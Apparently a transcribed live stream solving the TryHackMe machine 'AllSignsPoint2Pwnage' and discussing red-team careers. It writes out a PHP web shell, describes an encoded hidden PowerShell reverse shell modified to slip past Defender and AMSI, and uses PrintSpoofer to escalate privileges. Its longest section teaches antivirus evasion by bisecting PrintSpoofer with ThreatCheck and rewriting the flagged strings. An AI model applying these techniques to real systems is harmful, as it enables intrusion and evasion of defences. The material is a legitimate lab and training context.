app. So it can't pop a message box. It doesn't have the prerequisite DLL to pop a message box. It worked in Bytebleeder's example because Bytebleeder was injecting into a GUI program that had the DLL that it needs. But a console app can't pop a message box because it's not a GUI app. It needs to be a GUI app. And my Visual Studio Code, I had forgotten I had set to compile console apps for debugging purposes. So that was me being really fucking stupid. If you ever feel really fucking stupid, it just happens all the time in this field, okay? It just happens all the time in this field. I felt really fucking stupid after I figured that out. But fortunately, my code did work. It does work now, and I'll take that. Prelim, tech V, tech PM. Okay? That's why Nim is awesome. Yeah, Nim is fucking fantastic. If you use it right, I was just shooting myself in the foot over and over again. And the worst part is I spent an hour going over the code. Like, am I executing one of these calls wrong? What the fuck is going on? Because when you're dealing with the Windows API, and especially in Nim, like, for example, you have to call, like, the Windows version of null. You can't call the Nim version of null. It's really, really bizarre. Like, sometimes the syntax at once. But I was pretty sure I was doing it right. I looked at Marcello's work, Bytebleeder's work, and I was like, as a sanity check, and I'm like, I'm pretty sure I'm doing this right. I'm like, what the fuck is going on here? It just wouldn't pop the message box. But it popped a Meterpreter shell instantly. Meterpreter ran without an issue. It just immediately popped. And I'm like, what the fuck is going... Oh, it's a console app. You have to pull teeth to get error. Yeah, you have to do get last error, which is a pain in the ass. I was about to do that. But I probably should have done that. I don't know if it actually would have shown me what I needed to see. The problem was that GDI32.dll is not in there. GDI32.dll is what it needs. That's the GUI. That's the GUI DLL. The DLL that forms the basis for making GUI apps. Is the name of the box Quotient? No. Thank you for reminding me. Anyway, you're gonna see all of this in the video that's coming out. It'll probably come out after DEF CON. I don't think I'll finish it before DEF CON. We'll see how far I get in it for the later today. Is that even gonna fit? You'll probably see it after DEF CON, but yeah, I'm making a video on the whole thing. Don't worry. You'll see. I'm going to walk you through. I'm going to show you the code. I'm going to walk you through how it works. I'm going to walk you through calling the Windows API. Don't be afraid to call the Windows API. Okay? Don't be afraid. That's what it's there for. It's there to be called. But it does take a little bit. It is a little bit intimidating, so I'm going to do my best to break it down. That's why we're doing it in Nim. Okay? Nim is relatively easy to read. Okay, so as somebody pointed out, this does not look like a DC. This does not look like a DC. It is missing many of the quintessential domain controller ports. Those ports would be 389, which is LDAP, 88, which is Kerberos, 636, which is LDAP over SSL. It's also missing, it might be missing 9585, which is WinRM. It does have VNC, interestingly. So this does not appear to be, and it's also missing 53, which is DNS. Good call. Most domain controllers will have port 53 open. We see something, we see anonymous FTP login allowed, and we see a notice.txt. So let's look there first. So it looks like whatever it is, it's not ADCS, which makes sense for a Windows machine. I would not expect a medium machine to be ADCS, actually. That would be a little bit. ADCS is still pretty new as far as exploitation of it. SpectreOps did an absolutely fantastic white paper on it last year, but it's still, people are still catching up to it. You should develop some offensive tooling in Rust. Like, honestly, I'm trying to learn Rust a little bit, but the syntax is very obtuse to me. Coming from Python and C, it's just rough. Rust looks like functional programming, and functional programming looks like actual Eldritch runes to me. Like, I just can't, like, my eyes, my brain, my primitive primate brain is not enough to comprehend the Eldritch runes of fucking functional programming or Rust. But I do genuinely want to learn it. Go is fine. Go is readable. Let's get notice.txt. But Rust is another good offensive tooling development thing. Don't get me wrong. I'm not knocking Rust. I just don't like the syntax. I just don't like the syntax of Rust. Okay? Both Rust and Go exist to serve the same purpose. So learning only one of them is probably important initially. Like, don't learn both Rust and Go immediately. Pick the one that you think looks better, and as far as the syntax, and go with that one. Rust and Go exist to fill the same need, which is how to code in C, as in low-level programming, without needing to code in C, because coding in C is dangerous. Don't like or don't know? What do you mean don't like? I don't know Rust. I mean, I just don't find it readable. I just don't find it readable. Rust is difficult for me to read. The syntax is very obtuse to me. But other people find it very readable and understandable. So it says a lot in only a little bit of language. But I'm like a C and Python guy. So it's just harder. It's a higher learning curve for me. Which programming languages are essential for a red teamer? The only one that I would say is absolutely essential for a red teamer is C#. At this point in time, the only programming language that I would say is absolutely essential for a red teamer is C#. You absolutely must know some C# to be a competent red teamer. And hopefully other red teamers and pen testers in the chat will agree with me on that. All languages will be useful to you, but especially C#. Because C# is used a lot in red teaming and penetration testing in general. Due to consumer complaints about using FTP, we have now, after C#, it's probably C as your most important language, specifically because of beacon object files. Due to customer complaints about using FTP, we have now moved images to a hidden Windows file. Oh boy, hidden. It's a spectral Windows file share. There's a trap door for upload and management of images. Hidden window. Okay, so there's a Windows file share. Let's do crackmap exec. Let's see how hidden this file share is, okay? How hidden do you guys think the file share is likely to be? Let's find out. Can you explain what a red teamer is? So a red teamer is like a subset of penetration tester that does adversary emulation. A red teamer pretends to be a bad guy and tries to break into an organization's network, steal their data, and be undetected while they're doing it. That's essentially what a red teamer is, as opposed to a penetration tester. So Windows 10 build, kind of an older Windows 10 build. I think this is from like, what, 2020? 2020-ish build of Windows 10. So SMB signing is false. So this is probably not a domain controller. Domain controller have SMB signing turned to true by default. So this is probably not a domain controller. Let's try you. Let's try no username and no password. This is called a null session. See if we can authenticate. How about opcodes, like understanding disassembly? You mean assembly? Oh, hell yeah. Assembly will be super useful to you. You might find assembly harder to learn than other ones, but absolutely assembly will be useful to you. Okay, we didn't get any connection there. Let's try the guest account. Again, with no password. Is there a place in red teaming for someone like me who can really only do Linux stuff? Yeah. You'll just be red teaming Linux environments. Like, the red teams happen in Linux-based environments. There are environments out there that are Linux and Mac OS-based predominantly and not Windows-based. So yeah, you can have a red teamer predominantly on Linux. It's just that if you want to get a red teaming job, you're probably going to have to learn Windows, unless you're on some kind of an internal red team. Like, if you're working for like for a company, if you're on an internal red team for like a company that is predominantly Linux and Mac OS, then hell yeah. Then you can be a Linux-based red teamer. Absolutely. But if you're on like a consulting position as a red teamer, if you're red teaming a wide variety of different organizations, you're going to have to learn Windows because Windows is the majority of the market share. The majority of corporations out there are Windows. You do have corporations that are predominantly Linux or Mac OS, but the majority of corporations are in Windows-based Active Directory environments. Most certs also need Windows. Yeah, most certs will require you to know a little bit of Windows. We can authenticate as the guest account. We can authenticate as the guest account with no password. So we can do shares here. You can see what shares. Let's see all the shares. I can't wait to see how hidden this share is. Ready? You guys ready for the hidden share? Why did it not? It authenticated. Did I do something wrong? Maybe I need to run a num for Linux to get the shares. Huh. That is strange. Maybe the guest account isn't allowed to get the shares or something? It's hidden? Yeah, apparently it's hidden pretty well. Let's do SMB map. I think, what is the... Let me look at the help for SMB map. We need to list the shares. TAC U is username. If omitted, null session assumed. Okay. Okay, so SMB map. TAC H is the host. .194.5. TAC U is guest. TAC P, and we put no password. See if we can get that. Since you're testing for null sessions, why don't you use SMB client? We certainly could use SMB client. We get an authentication error. It looked like it authenticated there with crackmap exec. That is odd. I found it with SMB client TAC L. We can do that too. There's lots of ways to enumerate shares on a Windows machine. Plenty of ways to do this. Please don't think that mine is the only way you have. Oh, there we go. So I was just putting the password in here. Like, I don't know why this is different from just not including the whatever. Doesn't matter. The point is we can see now. Ah, yes. Very hidden. Oh my god, it's invisible. Chat. It's invisible. This is... How are we ever gonna find... This is that guy who's in like This is that guy who's walking around in the mall in like camo clothing, and you're like, oh my god, where is his torso? Where is his torso? Like, his head is just floating in midair. What's going on? Does anyone find it weird how we all hate the camouflage jokes? We all hate those jokes. We all hate jokes about people wearing camouflage pattern. And yet we do it anyway. Like, we always do it. It absolutely has to be done. We have to make the joke every time. Okay, so let's do SMB client. 1010 194.5 images $. Now we notice we have read and write access, so we're probably gonna have to push something to this at some point. Attack view guest, and we don't put a password. I like camo jokes, but you can't always see them. That is true. That is true. Okay, we get some JPEGs, some PNGs. Oh boy, these better not be porn. Okay, we'll just download all of these. Security by obscurity. Honestly, I think security by obscurity is underrated. I'm going to be honest with you. As an InfoSec professional, I think security by obscurity is underrated. Should it be your only security measure in place? Absolutely not. But it does have a place in a... security by obscurity, I would argue, does have a place. Is this just clip art shit? Is this just Mercy from Overwatch? No, this is male Mercy from Overwatch. We have male Mercy from Overwatch on a pair computer, apparently. We have, yes, like just the classic binary streaming down the, yep. Yeah, we're going to exif tool. I'm aware that exif tool exists. Thank you. I'm just looking at all of these, just laying eyes on them. All right, let's do exif tool then. Exif tool, internet. Nothing there. Exif tool. Man. Exif tool monitor. If you guys are seeing something and I'm not, I'll go slower so I can properly look. I don't see anything that looks... We're looking for like usernames. Like usernames would be good. Comments would be good. Neon sign. Well, this one has more stuff. Hewlett Packard. Cathode ray tube display. Hot steg action. It could be steganography. Like, I feel like I shouldn't jump to steganography. Oh. It has things to fill out. It doesn't just have a username. I just realized it has, like, how many TCP ports under... Okay, let's look at this really quickly. I just looked at the thing, and I noticed that, let's less prelim. We have 1, 2, 3, 4, 5, 6. I think just 6. Though I didn't do attack ptac, so. Okay, 6. What's the hidden share where images should be copied to? images dollar. I thought it would mean images like machine images, not like images like pictures. All right, so I don't want to spoil the next part of the box, so let's just proceed. We do see, actually, that there is a port 80. We focused immediately on this FTP, and that took us down a path. But these appear to just be images. Unless they're steganography. I don't want to just jump straight to steganography, because steganography is pretty rare in CTFs, thankfully, because it's dumb. We do also see these web servers here. Let's connect to the SSL one and see what we can get there. The web servers are definitely... I want to exhaust our other options for enumeration before we... before we start looking for steganography in images. Self-signed certificate, bad cert domain. So probably it's looking, the certificate is going to be looking for, it's flagging on burp. That's why it's getting a bad cert domain, I think. Yeah, now we get the self-signed cert. It gets the bad cert domain when we have burp. Oh, so we have images here. There are images. This is one of the images that we saw. So let's view the page source. Okay, so we see simple slideshow. Oh, so it just cycles through these. Interesting. This will display... Okay, so get the... Okay, so PHP is being loaded, I'm noticing. Sick site? Yeah, oh, definitely. This is totally modern. Let's just see what this is doing. Content.php. Where are the images being loaded from? Where are we actually uploading to? Slash images? So it looks like the images are in slash images. Let's see if we can... Let's try to reach slash images. Is there a slash images folder? There is! Here are our images. Here are our images. And we also see that there's PHP present. So, yeah, we do have write access to the share. So, yeah, so, yes, very hidden. Very hidden. So we can write a Cthulhu.php here. PHP. We'll write a simple PHP web shell here. Echo Cthulhu fhtagn. You can use any PHP web shell you want here. I'm just going to do one, a simple one really quickly. System. $_request. CMD. Okay. So going through really quickly. Again, this is a very simple web shell. All this is going to do is it's going to echo the words Cthulhu fhtagn to the screen. I do this so that I know my PHP is executing, even if the following line doesn't execute, because sometimes PHP might be running, but sometimes PHP is accessible and will execute my code, but sometimes the system function is not allowed. Sometimes PHP has the system function blocked. So if this is echoed to the screen, but I don't get command output, that means that the system function is not allowed. So I can probably try pass-through and other functions. What is Cthulhu fhtagn? It's just it just fits our theme. It's just, if you Google it, Googling it'll explain it better than I'm going to be able to right here. All right, so very simple web shell here. Let's go ahead and connect with SMB client to the server again. Was I in this one? Can I just up arrow? No, it's in, it's over here. SMB client. Let's connect. Put Cthulhu.php. Okay. So let's look at images again. And we do see that our Cthulhu.php miraculously...
Hey listen, Mr. Streamer at fhtagn is trying to get your attention.
What? You have hey listen. What's up, Hate Handles? What's up? What's up? Thank you, Oreo Bite, for the 100 Tiggle Biddies, by the way. And for the 1 Tiggle Biddy. This is another test with a test testing a super testing all the tests. Yeah. Anthony J.A., thank you for the 50 Tiggle Biddies. Lejan, Bite Sweeper, and Miroslav, thank you for the follow. I broke my computer. I am a sad boy. How did you break it? What machine is this? This is AllSignsPoint2Pwnage on TryHackMe. Stuck on splash screen. Well, I can try and help you after the stream, if you'd like. So we click on Cthulhu.php, and we do see that we get Cthulhu fhtagn echoed to the screen. And because PHP is configured to have verbose error messages, it's giving us an undefined index, cannot execute a blank command, because we haven't supplied a CMD command. So we could CMD equals who am I? And now we see that we do get remote code execution. Does that make sense? Does that whole process make sense, chat? Let's do Stream Raiders really quickly to give people a chance to ask questions if they have. I'm losing a lot of not backup stuff. I should know better. Yeah, dude. I mean, that's just a lesson you got to learn. You got to back your stuff up. You got to back it up. That's just the way it is. If it isn't backed up at least twice, it's not backed up. Can you do something with spaces like cmd whoami/groups? Yes, you can. I'll demonstrate it here in a second. We're gonna let me start up Burp. Burp actually is already started, but let me go ahead and change the font so you can see it better. We're gonna do it in Burp here really quickly, and it'll make more sense then. There's a I can show you how to execute commands easily. Sorovi with the most kills, and Big Ant and EtsySec with the most bonus rewards. Okay, Hawakawa, thank you for the follow. Okay, so we have Burp open here. You're going to see all of the crap that I had from yesterday. I'm going to have to delete all of this, I think. Let's just route by number. We were working on moderators yesterday on Hack-the-Box. Let's just refresh the page. We'll get a new request. Here we go. We send this to repeater. Okay, so now we can just do this right here in Burp. And we see that we have our remote code execution. Now, the nice thing about doing the $_request. The nice thing about this $_request is that it also works with post requests. So you can do change request method. And you can send a post request instead of a get request to this PHP. And the way that this helps is that you have fewer problems with bad characters. I have fewer problems with bad characters in post requests than I do in get requests. Also, get requests are limited to a certain length depending on the server, but post requests are not limited in length. So we can now generate a reverse shell using Hack Tools, our browser extension. Uh, 10.13.10.69. Nice. 8443. We don't want bash. We want... actually, we need a PowerShell reverse shell, don't we? But we have one right here. But this one might get caught by Windows Defender. So let me use the one from... Let me use the one from... Let me just use the one from my Necronomicon. This one has been modified so that it will not get caught by Windows Defender by default. So if you just copy this. This is available on my Patreon, by the way. If you're not sure where I'm getting this from. It's basically just a modified version of this. This will get caught by the most recent Windows Defender signatures. They finally caught on to that. Okay, let's just paste it in here. We just need to 10.13.10.6.9 8443. Okay, so we can take this. Caught on to what? Caught on to that reverse shell one-liner. This PowerShell reverse shell gets caught by Windows Defender. Mine doesn't anymore, but the standard one does. Cthulhu.ps1. Just paste that in. Okay. Now we need to do an iConvert. PowerShell wants specifically 16-bit little endian Unicode. As irritating as that is. Cthulhu.ps1. And if you... It doesn't look any different in my terminal, but it's a differently encoded... It's different. It's not ASCII anymore. It's been changed into Unicode, which is what PowerShell prefers. TR, TAC D, and we'll remove any of the new lines. Here we go. You can just do TAC W0, I think, for that. Yeah, that's the same. So, all right, we take this. Okay. Now what we send in here. And you can do whoami/all, and you can just URL encode this. I was almost doing the zap thing there for a second. Control U. Send. And now you'll see the output of whoami/all. Here you go. So now you get a lot more output. So you just have to URL encode it, that's all. We're going to do PowerShell.exe, tech nop, tech exec, bypass. I don't think execution policy should trigger here, but we're going to bypass it anyways. TAC W hidden, so it runs in a hidden window. And then TAC E for encoded shell, or for encoded, and we're going to paste that in. Now we're going to URL encode all of that. And we can netcat tech NLVP 8443 and send. It looks like it's trying. It's hanging. He's been converted to Zap. I have not been converted to Zap. Is there a time frame for WebEx DLL hijacking compilation at your Patreon? Oh yeah, I did want to do that DLL hijacking thing, didn't I? I do need to still do that. I still do need to do that. I'm working on the shellcode injection right now. After this first shellcode injection one, we'll do DLL hijacking. Oh yeah, we did get a connection. It just took a little bit to come in there. It looks like it just takes a second. There we go. Actually, let's do it again. Let's exit out. I forgot to do RL wrap. RL wrap makes this a lot cleaner. It's going to take a second to come in again. Does anybody have any questions? Any questions about any of that? Can you upload a full PHP reverse shell to SMB server? That's what. Yeah, you can. You absolutely can. You could have. You would need a PHP reverse shell that's specifically for Windows. Like the standard one on Kali would not have worked because that's for Linux. But yeah, you could have absolutely done that. You don't have to do what I'm doing here. What is RL wrap? RL wrap basically just it basically just properly formats the terminal output. Would AMSI catch this? No, because this reverse shell has been modified to bypass AMSI. The standard reverse shell, like the one that's in Hack Tools right here, if it's an updated Windows Defender, this will get caught. This will get caught by modern Windows Defender, like an up-to-date one, like the last couple of months. But I don't know how up-to-date this Windows Defender is. I've modified this. The one that I used is a modified version of this that bypasses Windows Defender. The biggest thing is this is a signature. This PS space string right here, this is a signature. All this is the prompt, the PowerShell prompt. I changed it to CF, which is Cthulhu fhtagn. But I basically just modified that one so that it would bypass Windows Defender again. Very simple stuff. Can you do a quick recap? Yeah, sure. So, we found an open file share. The box claimed it was hidden, but it was not hidden enough. And we had write access to the share, and the share just had a whole bunch of images on it, like whole bunch of pictures. So we looked at the pictures. We ran them through a XIF tool. Nothing of interest. Then we looked at the web server, and we found that the web server was displaying the images. So we figured if the images are being displayed, we might be able to reach the folder, a folder on the web server from the SMB server. So we uploaded a PHP shell to the web server, and we were able to reach it and execute it. And then inside of our PHP web shell, we executed a PowerShell one-liner to get a reverse shell, which is what we have here. Does that make sense? What's the name of that program that generates shells? This is just Hack Tools. This is a browser extension. You can see the little symbol up here. It's just a browser extension. Just Google Hack Tools Firefox. There's also a Chrome version, and you can download this. It has reverse shells in here. It can generate a whole PHP reverse shell for PHP web shell for you right here. It can give you PowerShell commands for like Active Directory enumeration and stuff. Obfuscate it. It has a lot of stuff, and it's being actively maintained and updated. Really useful. How would you fix this if you had to provide a fix on a report? First of all, don't have a world writable share that you can access with no credentials. I just needed the guest account. Remember, the share was accessible with no credentials whatsoever. And then the share should not be directly accessible from the web server. We have remote code execution because we could upload PHP directly to the web server and then execute it. Any chance you'll do some stuff on pivoting? Yeah, absolutely. I can do that for sure. Some red teamer pivoting. I absolutely be happy to do that. I need to start cranking out YouTube content. Oh, and if you know video editing, I'm probably going to need a good video editor for my YouTube content. Okay? So if you're interested, I would be paying. You wouldn't do free work. I, of all people, would never have you do free work. But if you're interested in doing some video editing for me on my YouTube channel, I would be open to that. Just reach out to me on Discord. Grinder, I'm just going to call you Grinder, with the 5-month re-indoctrination into the cult. Good day to you indeed. Did you ever find a 0 day? I found several, but I've never gotten approval for it. I've never gotten, not several, I found 2. But the company wanted to keep them quiet. I was testing proprietary apps, and these were for company proprietary apps, so the company kept them internal. If someone not being paid by the company had discovered them, they would have been a 0 day. But I discovered them while I was working for them and testing their app. So technically, it's not a 0 day. It technically was a 0 day, but I don't get credit for it. Anthony J.A. with the 100 Tiggle biddies. Thank you so much. Welcome back to the All. Thank you. It's good to have you in the chat. All right. So now we have our shell, which means...
Hackerman.
I'm in. All right, we in. We in, boys. Okay? Any other questions about how we got to this point? We did. I didn't explain stuff as completely as I would have on Newbie Tuesday. This is not Newbie Tuesday, but on Newbie Tuesday I do explain things more completely. Any other questions? Oh, let's get caught up on the. How common is it to find null sessions in the wild? Not super common, but I confess I don't look as often as I should because I usually have credentials. Deploy the machine. Okay, so we finished enumeration. Foothold. What user is signed into the All right, looks like they're walking. I didn't realize they were going to walk me through the next part. So let's do who am I? Okay, so we are the sign user. Let's do who am I /all. Wee woo, wee woo, wee woo, wee woo, wee woo. That's going to be interesting. Okay, we're not in a domain environment, it looks like. It does indeed look like we are not in a domain environment. It may not be Juicy Potato. This might be too up to date for Juicy Potato, but Rotten Potato might work. But the problem is Rotten Potato is fucking annoying. Rotten Potato is super irritating. You have to do like a... You have to do a SOCAT port forward and all kinds of shit in order to get that to work. It's a pain in the ass. We do see that. It looked like it was trying to lead us down a different path. Let's see if we can find the intended path before I start trying to run a very irritating exploit. It is Windows 10, and it's like a 2020 version of Windows 10, which a potato exploit might work, but then again, it might not. It asks what user was logged in via the console. Just Google it. How to see users logged in with console Windows command line. Using query command? Query user. Sign, as it appears. That is us. So, sign. What hidden non-standard share is only remotely accessible as an administrative account? I think we did see another share, didn't we? Attack H. 1010. 194.5. Attack U. Guest. Has attack lowercase u. SMB client uses attack uppercase u. We could certainly try print spoofer. If you want, we can try print spoofer. It seems like it's trying to lead us down a different path here. But I guess we can try print spoofer. We have no access. Installs is the only one other than images that's non-standard, so I guess this is what they mean. Oh yeah, and then the user flag. We want the user flag, don't we? CD sign desktop. User flag. Abusing system functionality for fun and profit. Indeed. There we go. Pretty straightforward. Now, does it want... Yeah, it wants me to go down a different path here, it looks like. It seems like it wants me to go down a different path here. Reminds me of Relevant. I use Print Spoofer. We could try... Like, we can go ahead and try Print Spoofer if you guys are that interested in it. The thing is, I don't know if I have a compiled version. Do I have a compiled version of Print Spoofer, I wonder? Actually, I think they have a release. Print Spoofer. GitHub. We could... I don't think Juicy Potato will work. But Print Spoofer might. Let's move downloads Print Spoofer here. Move Print Spoofer to ps64.exe. Just do lowercase. ps64.exe. I don't know if Windows Defender will catch it or not. My guess is it will. And I'd have to modify it to get it past Windows Defender. Let's go wget http://10.13.1069. Nice. ps64.exe. So one problem with this reverse shell is that it won't show errors. If we get errors, we're not going to see them. We have to type $error to look at the error variable to see any errors that we generate. Okay, so ps64.exe, let's see if it executes. I thought for a long time you needed to be a network service, but that doesn't seem to be the case. Let's just do TAC-H to see if it gives us the output. Windows Defender is probably going to stop it. No, it does not. Believe it or not, Windows Defender does not stop it. Execute the command. Let's just execute ping. Let's not do interact. Let's just do print spoofer, tac-c, ping, 10, 13, 10, 6, 9. It's on 0, ICMP. Ping. Let's see if that does it. I think it actually worked. It fucking did. Okay, well, it looks like Print Spoofer is an unintended priv-esque. Would you guys like to know how to obfuscate it? Would that be valuable to you guys? To see how to obfuscate Print Spoofer? Like, if it got caught by Windows Defender? Okay, well, all right, we'll do it. I got my dev box open right now anyways. So let's bop it over here. I happen to have my dev box open right now anyways. So we'll pop it over here, all right? Let's turn Windows Defender. We'll leave it off for right now, although it may have come back on its own. Windows Defender has that fucking annoying quality where it tends to come on its own. But it has not this time, so... Do I not have Firefox on here? I do not. How do I not? Whatever. Doesn't matter. GitHub. Print spoofer. All right. So let's see if Windows Defender catches it out of the box. I suspect it will. I would be very surprised if it was not caught by Windows Defender. Blocked by Windows Defender Smart Screen. Report this file is safe. Very safe. Very, very safe, Microsoft. Yes. Very, very safe. Let's do it in Chrome. So we don't have Smart Screen to worry about. This is not necessary on the box, but I think it's useful to see. It's a little bit above and beyond. Let's download it, and let's see. We want to keep it. All right. Show in folder. Print spoofer 64.exe. It's in an excluded folder. Let's actually put it back in the downloads. Let's turn Windows. Let's right-click, and let's scan with Windows Defender. Items skipped. It looks like my downloads folder is indeed in an exception. Where is one? Is it? Did I put it? I didn't make the C drive an exception, did I? Let's try scanning it there. There we go. So Windows Defender does pop here. Windows Defender found threats. It says it's print spoofer. So Windows Defender does know. Does know this. We can go ahead and remove it. That's fine. Oh shit. I shouldn't have removed it. Now I just need to download it again. Because now, the first thing you want to do when you're obfuscating a file, the first thing you want to do is you want to know exactly what in the file is being caught. This is the RimWorld soundtrack. Okay, the first thing, so we had Windows Defender remove it because I wasn't paying attention. Let's go ahead and download this again. Let's keep it. All right. So what we need here is we need to know what part of this file is getting caught. Okay? We need to know what part of this file is getting caught. Let's do a quick paint stream so I can illustrate what's about to what we're about to do. Okay? You can do this manually, but there's no need to, and we're going to explain why. So let's say this is the file. Okay? Let's say this is the file. This is print spoofer. Okay? Let's say this is print spoofer. Okay? With something as basic as UPX? Possibly? I'm not sure. We're going to do it manually. I'm not gonna comment on like what specific tools would probably work. I'm gonna show you how to obfuscate it manually so that you're not reliant on tools in the future. Okay? So let's say this is print spoofer and Windows Defender flags on it. What is happening when Windows Defender flags on it? Okay? Windows Defender, we'll illustrate this with a paintbrush, is going to read this whole file, and let's say it finds what is Windows Defender looking for? What is Windows Defender looking for? Signatures. What is a signature? What is a signature? Be more specific. What is a signature? It is looking for signatures, but what is it? A signature is some kind of it's some kind of series of data. Usually a string, but not always. Usually a string that the Windows Defender people, the people controlling Windows Defender, have decided is malicious. It's indicative of a malicious file. Okay? For example, in the executable Mimikatz, what do you think is likely to be a signature in the Mimikatz executable? It's not hard. What do you think is likely in the Mimikatz executable? Yeah, how about just the string Mimikatz? Or Kiwi. Kiwi also uniquely identifies Mimikatz. If an executable that Windows Defender is scanning has the string Mimikatz in it, do you think it's very likely that executable is malicious? What do you think? Yeah. Yes. Yes. Mimikatz is a known malicious string. Okay? So the same thing is happening in print spoofer. Maybe not on a string, but probably. Okay? Usually signatures are strings, but not always. Okay? Let's say Windows Defender finds a malicious string right here in the executable. Okay? This is highly oversimplified, I know, but whatever. Okay, if it finds a malicious string, boom, the file is malicious. Just rename the file name. You can. It's not just the name of the file. The string Mimikatz appears in the file Mimikatz. It's not just in the name. If you just rename Mimikatz to something else, the string Mimikatz still exists in the file. This is what This is basically what antivirus is doing. This is the most basic form of antivirus detection. Now, if you go as AV gets more sophisticated, we start talking about EDR. That's a different story. But this is the most basic operation of antivirus. Does that make sense? So we don't actually know where the signature is. Windows Defender won't tell us where the signature actually is. All it's going to tell us is that the file contains a malicious signature. That's all it's telling us. We need to find out where the string is. Where is the signature? What is being flagged? So what can we do? Well, what if we cut this in half? What if we take the print spoofer file and we cut it in half? And then we have two files. We make two files. And and I'll illustrate that right down here as well. Again, two separate files now. We've cut print spoofer in half. Obviously, it won't execute it this way. All we're doing is taking the file and writing the first half of the bytes into a different file, and the second half first in the one file, and the second half into a different file. We cut it in half. It won't execute this way, but it doesn't need to execute. It doesn't need to execute in this format. .5. Let's go. Let's do print spoofer 1. 0.1 to 0.5. Print spoofer 0.6 to 1. Okay, I'm just illustrating that. I'm just illustrating these are two halves of the file. So remember, the malicious string was down here, right? The malicious string was down here. So Windows Defender will scan two files now. We have Windows Defender scan two files. It scans this one. Clean. Because no malicious strings are in there. But then it scans this one. And it hits the malicious string. Right there. Right? Flagged. So now we know that the malicious string is somewhere in the second half of the file. Is everyone following me so far? Is everyone following me so far? Like on the theory here. How to prevent this? You can't prevent this. This is a basic form of manual obfuscation. So now what do we do? We know the string is in the second half of print spoofer. Now what do we do? Yeah, we split it in half again. Let's just keep doing this. We split it in half again. So now we have we don't bother with this one because this one's clean. But now we have another file, which is even, now we have the second, like, now print spoofers is split into fourths. Okay? Right? Now we have Windows Defender scan those, and we determine which one of these contains the signature. And then we split it again, and we split it again, and we split it again, and we do that until we've narrowed down exactly which string of bytes contains the signature. Does that make sense, chat? Like the two files would have it, how to handle that? Then you'd probably assume that you just happen to get, like, split the file. If the signature was split, it's probably no longer going to be a signature. Like, if you manage to split the signature between two files, it's probably not going to be a signature anymore. Okay? And the good news is, you don't have to do this manually. You can. You absolutely can do this manually. IPSec actually has a fantastic video on obfuscating Mimikatz using this exact procedure. And he does it all manually and walks you through how to obfuscate Mimikatz manually using this exact procedure. But we can automate this. This is very easy to automate. And Rastamouse actually has an excellent tool that I've been using to do just that. It's called Threat Check. There are plenty of tools that will do this on the market. I just like Rastamouse's version. Does he? I'm assuming he has it on GitHub, doesn't he? Yeah, here you go. This is Threat Check. This is what I'm using here. And we just feed it the file. You can either do Defender or AMSI. AMSI is for PowerShell scripts. So we just want to do Defender. It'll do Defender by default. So we'll do FC. Did I actually download it again? Yeah. So let's do print spoofer. So all this is going to do, it's going to split. It's doing, do you see how it's doing? It's splitting. It's doing exactly this procedure. It's just doing it very fast. How to know the flag signature. That's what we're trying to figure out. We're trying to figure out where the signature is. That's all. All right. So the end of this tends to be the malicious part. Although we do see a print spoofer.exe. We see netcat.exe. The end of the, this is where these are the raw bytes of the file that print spoofer has identified the signature is somewhere in here. These are the raw bytes of the file that print spoofer is showing us. The chances are the actual signature is towards the end of this. Usually I find that it's towards the end of this portion. This impersonate privilege might be the signature. Okay, so we have an idea of where to look in the file. Okay, so now we know where the file is. Now we need to download it. Let's turn Windows Defender off so it doesn't cuck us while we're working on this. Actually, I think real-time monitoring is off, so it shouldn't give us a problem. Yeah, it doesn't. Okay. I think I also need to run... I need to... I refuse... I don't like to pay for Visual Studio, so I just keep renewing the free trial. Don't do this, chat. It's bad. Okay? I'm being a bad boy. I'm being a very bad boy right now, okay? Don't do this. You should definitely pay for software all the time. Okay? If I don't do this, Visual Studio will say it's expired. There we go. All right, so now let's just, we see print spoofer here. Let's make a desktop. Let's make a folder on the desktop. Hey, by the way, can anyone figure out what flute.exe is? I'll give you a hint. Flute.exe is another executable that I obfuscated using this same procedure. What do you think flute.exe is? What is flute.exe exactly? Let's just open a whole different PowerShell window. No idea, any hints? It's I named it following the inspiration for the original name of the executable. That is the hint. It's not Chisel. It's not Mimikatz. Think Red Team. I used it on a Red Team assessment. It's actually one of the most irritating executables to obfuscate. Rubius! Yeah, it's Rubius. Rubius is named after Rubius Hagrid from Harry Potter. It's named after Rubius Hagrid because Rubius plays a flute for Fluffy, the three-headed dog, to put it to sleep. Which is what you do with Kerberos. Kerberos tames the three-headed dog. Or Rubius tames the three-headed dog of Kerberos, so I named it flute.exe. Just a fun fact there. All right, now we need to do git clone. We need to clone the print spoofer code. So we take this, we clone it. Now we open it in Visual Studio. And it works fine in VirusTotal and all. No, I only guarantee this will work for Windows Defender. If you want to test against other AV engines, you're going to need to have those AV engines installed, or constantly upload your stuff to VirusTotal, which has its own problems because VirusTotal submits their data to those companies to improve their signatures. So I would recommend that you do not do that. Let's open a project. But this will work for Windows Defender for sure. This procedure would work for any antivirus, but you need you need to test against that antivirus. And right now we're only testing against Windows Defender. So we'll open print spoofer. Okay. So let's remember where the signature was located. So we're looking for, it looks like there's SE impersonate privilege. A privilege is missing. A privilege, SE impersonate, it looks like a string. A privilege is missing. So we're looking for a string that says something like that somewhere in this file. We're probably not looking in the header files. Probably the source files. All right, let's take a look. Let's see if we can find any strings. Visual Studio highlights the strings nicely, so we're looking for a string that looks like this. A privilege is missing. Now, I find that a lot of times the help dialog gets you, is signatured. So a lot of times if I'm really trying to obfuscate something, I just remove all the strings and replace them entirely from the start. I replace all the strings. But look, see, we see a privilege is missing. Let's just change that. Let's see if that privilege appears anywhere else. You can also do, like, find. It's probably under search. Where's find and replace in Visual Studio? God, you think I've never used this program. Where is find and replace? Is it under edit? Find and replace. Quick replace. All right, let's just do quick find. We'll do quick replace. That's fine. So, is missing. And it looks like it can't even find it. It looks like that was the only one. It says a privilege is missing. So all we did was find the specific string that's being flagged. It says a privilege is missing right here. And we've changed that now. So let's recompile. Let's now recompile. Let's change it to release so he doesn't have debugging symbols. And let's build the solution again. Okay, it's compiling. There we go. It did succeed. It is compiled. Let's remove this old one. And let's move. Let's go over here. Let's go to desktop. Print spoofer example. 64, release, print spoofer.exe. Okay. So now let's test it again. It's just print spoofer.exe. Okay, we found another threat. We have another signature. Let's see what it flags on this time. Okay, so now it says, and you're going to have, this is kind of an iterative process, okay? This is kind of, and yet what about print spoofer? Yeah, that could definitely be seen as malicious. If you really wanted to be meticulous, you could go through this entire file and change all the strings, which is what I do when I obfuscate my stuff professionally. I'll change the strings. I'll change the function names. I'll change the loaded library's name sometimes. In the case of Bloodhound, I have to change the 